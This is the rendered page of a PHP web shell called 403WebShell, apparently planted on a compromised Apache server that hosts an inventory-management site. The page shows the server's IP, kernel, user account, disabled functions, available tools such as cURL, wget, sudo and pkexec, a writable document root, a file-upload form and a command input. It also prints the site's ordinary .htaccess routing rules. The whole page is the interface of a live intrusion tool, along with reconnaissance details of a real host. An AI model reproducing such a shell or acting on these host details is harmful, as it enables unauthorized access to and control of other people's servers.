Uname:Linux ip-10-0-5-176 6.8.0-1057-aws #60~22.04.1-Ubuntu SMP Wed May 27 08:16:59 UTC 2026 x86_64

403WebShell
403Webshell
Server IP : 3.111.61.48  /  Your IP : 216.73.216.67
Web Server : Apache
System : Linux ip-10-0-5-176 6.8.0-1057-aws #60~22.04.1-Ubuntu SMP Wed May 27 08:16:59 UTC 2026 x86_64
User : ubuntu ( 1000)
PHP Version : 8.2.31
Disable Function : exec,passthru,shell_exec,system
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/vhost/itms.arukustech.com/public/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/vhost/itms.arukustech.com/public/.htaccess
RewriteEngine On
RewriteBase /

# ----------------------
#  FORCE HTTPS
# ----------------------
RewriteCond %{HTTPS} off
RewriteRule ^(.*)$ https://%{HTTP_HOST}%{REQUEST_URI} [L,R=301]

# ----------------------
#  CLEAN URL ROUTING
# ----------------------
# /inventory/add ? /inventory_add.php
RewriteRule ^inventory/add$ inventory_add.php [L]

# /inventory/list ? /inventory_list.php
RewriteRule ^inventory/list$ inventory_list.php [L]

# /categories ? /categories.php
RewriteRule ^categories$ categories.php [L]

# ----------------------
#  API CLEAN ROUTES
# ----------------------
# /api/inventory/list ? api/inventory_list.php
RewriteRule ^api/inventory/list$ api/inventory_list.php [L]

RewriteRule ^api/inventory/add$ api/inventory_add.php [L]

RewriteRule ^api/inventory/delete$ api/inventory_delete.php [L]

RewriteRule ^api/categories/list$ api/categories_list.php [L]

RewriteRule ^api/categories/add$ api/categories_add.php [L]

RewriteRule ^api/categories/delete$ api/categories_delete.php [L]

# ----------------------
# Prevent directory listing
# ----------------------
Options -Indexes

Youez - 2016 - github.com/yon3zu
LinuXploit